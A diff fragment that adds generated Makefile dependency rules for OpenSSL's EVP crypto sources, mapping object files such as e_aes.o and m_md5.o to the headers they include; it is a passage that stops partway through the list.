+bio_enc.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+bio_enc.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+bio_enc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+bio_enc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_enc.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_enc.c
+bio_md.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+bio_md.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bio_md.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bio_md.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+bio_md.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+bio_md.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+bio_md.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+bio_md.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+bio_md.o: ../cryptlib.h bio_md.c
+bio_ok.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+bio_ok.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+bio_ok.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+bio_ok.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+bio_ok.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+bio_ok.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+bio_ok.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+bio_ok.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+bio_ok.o: ../../include/openssl/symhacks.h ../cryptlib.h bio_ok.c
+c_all.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+c_all.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+c_all.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+c_all.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+c_all.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+c_all.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+c_all.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+c_all.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+c_all.o: ../cryptlib.h c_all.c
+c_allc.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+c_allc.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+c_allc.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+c_allc.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+c_allc.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+c_allc.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+c_allc.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs12.h
+c_allc.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+c_allc.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+c_allc.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+c_allc.o: ../../include/openssl/x509_vfy.h ../cryptlib.h c_allc.c
+c_alld.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+c_alld.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+c_alld.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+c_alld.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+c_alld.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+c_alld.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+c_alld.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs12.h
+c_alld.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+c_alld.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+c_alld.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+c_alld.o: ../../include/openssl/x509_vfy.h ../cryptlib.h c_alld.c
+digest.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+digest.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+digest.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+digest.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+digest.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+digest.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+digest.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+digest.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+digest.o: ../cryptlib.h digest.c
+e_aes.o: ../../include/openssl/aes.h ../../include/openssl/asn1.h
+e_aes.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+e_aes.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_aes.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_aes.o: ../../include/openssl/modes.h ../../include/openssl/obj_mac.h
+e_aes.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+e_aes.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_aes.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+e_aes.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+e_aes.o: ../modes/modes_lcl.h e_aes.c evp_locl.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/aes.h ../../include/openssl/asn1.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/bio.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/crypto.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/e_os2.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/evp.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/modes.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/obj_mac.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/objects.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/opensslconf.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/opensslv.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/ossl_typ.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/rand.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/safestack.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/sha.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/stack.h
+e_aes_cbc_hmac_sha1.o: ../../include/openssl/symhacks.h ../modes/modes_lcl.h
+e_aes_cbc_hmac_sha1.o: e_aes_cbc_hmac_sha1.c
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/aes.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/asn1.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/bio.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/crypto.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/e_os2.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/evp.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/modes.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/obj_mac.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/objects.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/opensslconf.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/opensslv.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/ossl_typ.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/rand.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/safestack.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/sha.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/stack.h
+e_aes_cbc_hmac_sha256.o: ../../include/openssl/symhacks.h ../modes/modes_lcl.h
+e_aes_cbc_hmac_sha256.o: e_aes_cbc_hmac_sha256.c
+e_bf.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_bf.o: ../../include/openssl/blowfish.h ../../include/openssl/buffer.h
+e_bf.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+e_bf.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+e_bf.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+e_bf.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+e_bf.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_bf.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_bf.o: ../../include/openssl/symhacks.h ../cryptlib.h e_bf.c evp_locl.h
+e_camellia.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_camellia.o: ../../include/openssl/camellia.h ../../include/openssl/crypto.h
+e_camellia.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_camellia.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_camellia.o: ../../include/openssl/modes.h ../../include/openssl/obj_mac.h
+e_camellia.o: ../../include/openssl/objects.h
+e_camellia.o: ../../include/openssl/opensslconf.h
+e_camellia.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_camellia.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_camellia.o: ../../include/openssl/symhacks.h ../modes/modes_lcl.h
+e_camellia.o: e_camellia.c evp_locl.h
+e_cast.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_cast.o: ../../include/openssl/buffer.h ../../include/openssl/cast.h
+e_cast.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+e_cast.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+e_cast.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+e_cast.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+e_cast.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_cast.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_cast.o: ../../include/openssl/symhacks.h ../cryptlib.h e_cast.c evp_locl.h
+e_des.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_des.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_des.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+e_des.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_des.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_des.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+e_des.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+e_des.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+e_des.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_des.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+e_des.o: ../../include/openssl/ui_compat.h ../cryptlib.h e_des.c evp_locl.h
+e_des3.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_des3.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_des3.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+e_des3.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_des3.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_des3.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+e_des3.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+e_des3.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+e_des3.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+e_des3.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+e_des3.o: ../../include/openssl/ui.h ../../include/openssl/ui_compat.h
+e_des3.o: ../cryptlib.h e_des3.c evp_locl.h
+e_idea.o: ../../e_os.h ../../include/openssl/bio.h
+e_idea.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_idea.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_idea.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+e_idea.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_idea.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_idea.o: ../../include/openssl/symhacks.h ../cryptlib.h e_idea.c
+e_null.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_null.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_null.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_null.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_null.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+e_null.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+e_null.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+e_null.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+e_null.o: ../cryptlib.h e_null.c
+e_rc2.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_rc2.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_rc2.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_rc2.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_rc2.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+e_rc2.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+e_rc2.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rc2.h
+e_rc2.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_rc2.o: ../../include/openssl/symhacks.h ../cryptlib.h e_rc2.c evp_locl.h
+e_rc4.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_rc4.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_rc4.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_rc4.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+e_rc4.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+e_rc4.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+e_rc4.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rc4.h
+e_rc4.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_rc4.o: ../../include/openssl/symhacks.h ../cryptlib.h e_rc4.c evp_locl.h
+e_rc4_hmac_md5.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_rc4_hmac_md5.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+e_rc4_hmac_md5.o: ../../include/openssl/evp.h ../../include/openssl/md5.h
+e_rc4_hmac_md5.o: ../../include/openssl/obj_mac.h
+e_rc4_hmac_md5.o: ../../include/openssl/objects.h
+e_rc4_hmac_md5.o: ../../include/openssl/opensslconf.h
+e_rc4_hmac_md5.o: ../../include/openssl/opensslv.h
+e_rc4_hmac_md5.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rc4.h
+e_rc4_hmac_md5.o: ../../include/openssl/safestack.h
+e_rc4_hmac_md5.o: ../../include/openssl/stack.h
+e_rc4_hmac_md5.o: ../../include/openssl/symhacks.h e_rc4_hmac_md5.c
+e_rc5.o: ../../e_os.h ../../include/openssl/bio.h
+e_rc5.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+e_rc5.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+e_rc5.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+e_rc5.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_rc5.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_rc5.o: ../../include/openssl/symhacks.h ../cryptlib.h e_rc5.c
+e_seed.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+e_seed.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+e_seed.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+e_seed.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+e_seed.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+e_seed.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_seed.o: ../../include/openssl/safestack.h ../../include/openssl/seed.h
+e_seed.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+e_seed.o: e_seed.c evp_locl.h
+e_xcbc_d.o: ../../e_os.h ../../include/openssl/asn1.h
+e_xcbc_d.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+e_xcbc_d.o: ../../include/openssl/crypto.h ../../include/openssl/des.h
+e_xcbc_d.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+e_xcbc_d.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+e_xcbc_d.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+e_xcbc_d.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+e_xcbc_d.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+e_xcbc_d.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+e_xcbc_d.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+e_xcbc_d.o: ../../include/openssl/ui_compat.h ../cryptlib.h e_xcbc_d.c
+e_xcbc_d.o: evp_locl.h
+encode.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+encode.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+encode.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+encode.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+encode.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+encode.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+encode.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+encode.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+encode.o: ../cryptlib.h encode.c
+evp_acnf.o: ../../e_os.h ../../include/openssl/asn1.h
+evp_acnf.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+evp_acnf.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+evp_acnf.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+evp_acnf.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+evp_acnf.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+evp_acnf.o: ../../include/openssl/opensslconf.h
+evp_acnf.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+evp_acnf.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+evp_acnf.o: ../../include/openssl/symhacks.h ../cryptlib.h evp_acnf.c
+evp_cnf.o: ../../e_os.h ../../include/openssl/asn1.h
+evp_cnf.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+evp_cnf.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+evp_cnf.o: ../../include/openssl/dso.h ../../include/openssl/e_os2.h
+evp_cnf.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+evp_cnf.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+evp_cnf.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+evp_cnf.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+evp_cnf.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+evp_cnf.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+evp_cnf.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+evp_cnf.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+evp_cnf.o: ../cryptlib.h evp_cnf.c
+evp_enc.o: ../../e_os.h ../../include/openssl/asn1.h
+evp_enc.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+evp_enc.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+evp_enc.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+evp_enc.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+evp_enc.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+evp_enc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+evp_enc.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+evp_enc.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+evp_enc.o: ../cryptlib.h evp_enc.c evp_locl.h
+evp_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+evp_err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+evp_err.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+evp_err.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+evp_err.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+evp_err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+evp_err.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+evp_err.o: ../../include/openssl/symhacks.h evp_err.c
+evp_key.o: ../../e_os.h ../../include/openssl/asn1.h
+evp_key.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+evp_key.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+evp_key.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+evp_key.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+evp_key.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+evp_key.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+evp_key.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+evp_key.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+evp_key.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+evp_key.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+evp_key.o: ../cryptlib.h evp_key.c
+evp_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+evp_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+evp_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+evp_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+evp_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+evp_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+evp_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+evp_lib.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+evp_lib.o: ../../include/openssl/symhacks.h ../cryptlib.h evp_lib.c
+evp_pbe.o: ../../e_os.h ../../include/openssl/asn1.h
+evp_pbe.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+evp_pbe.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+evp_pbe.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+evp_pbe.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+evp_pbe.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+evp_pbe.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+evp_pbe.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+evp_pbe.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+evp_pbe.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+evp_pbe.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+evp_pbe.o: ../cryptlib.h evp_locl.h evp_pbe.c
+evp_pkey.o: ../../e_os.h ../../include/openssl/asn1.h
+evp_pkey.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+evp_pkey.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+evp_pkey.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+evp_pkey.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+evp_pkey.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+evp_pkey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+evp_pkey.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+evp_pkey.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+evp_pkey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+evp_pkey.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+evp_pkey.o: ../asn1/asn1_locl.h ../cryptlib.h evp_pkey.c
+m_dss.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+m_dss.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_dss.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+m_dss.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+m_dss.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+m_dss.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+m_dss.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+m_dss.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+m_dss.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+m_dss.o: ../cryptlib.h m_dss.c
+m_dss1.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+m_dss1.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_dss1.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+m_dss1.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+m_dss1.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+m_dss1.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+m_dss1.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+m_dss1.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+m_dss1.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+m_dss1.o: ../cryptlib.h m_dss1.c
+m_ecdsa.o: ../../e_os.h ../../include/openssl/asn1.h
+m_ecdsa.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+m_ecdsa.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+m_ecdsa.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+m_ecdsa.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+m_ecdsa.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+m_ecdsa.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+m_ecdsa.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+m_ecdsa.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+m_ecdsa.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+m_ecdsa.o: ../../include/openssl/x509_vfy.h ../cryptlib.h m_ecdsa.c
+m_md2.o: ../../e_os.h ../../include/openssl/bio.h
+m_md2.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_md2.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+m_md2.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+m_md2.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+m_md2.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+m_md2.o: ../../include/openssl/symhacks.h ../cryptlib.h m_md2.c
+m_md4.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+m_md4.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_md4.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+m_md4.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+m_md4.o: ../../include/openssl/md4.h ../../include/openssl/obj_mac.h
+m_md4.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+m_md4.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+m_md4.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+m_md4.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+m_md4.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+m_md4.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+m_md4.o: ../cryptlib.h evp_locl.h m_md4.c
+m_md5.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+m_md5.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_md5.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+m_md5.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+m_md5.o: ../../include/openssl/md5.h ../../include/openssl/obj_mac.h
+m_md5.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+m_md5.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+m_md5.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+m_md5.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+m_md5.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+m_md5.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+m_md5.o: ../cryptlib.h evp_locl.h m_md5.c
+m_mdc2.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+m_mdc2.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+m_mdc2.o: ../../include/openssl/des.h ../../include/openssl/des_old.h
+m_mdc2.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+m_mdc2.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+m_mdc2.o: ../../include/openssl/mdc2.h ../../include/openssl/obj_mac.h
+m_mdc2.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+m_mdc2.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
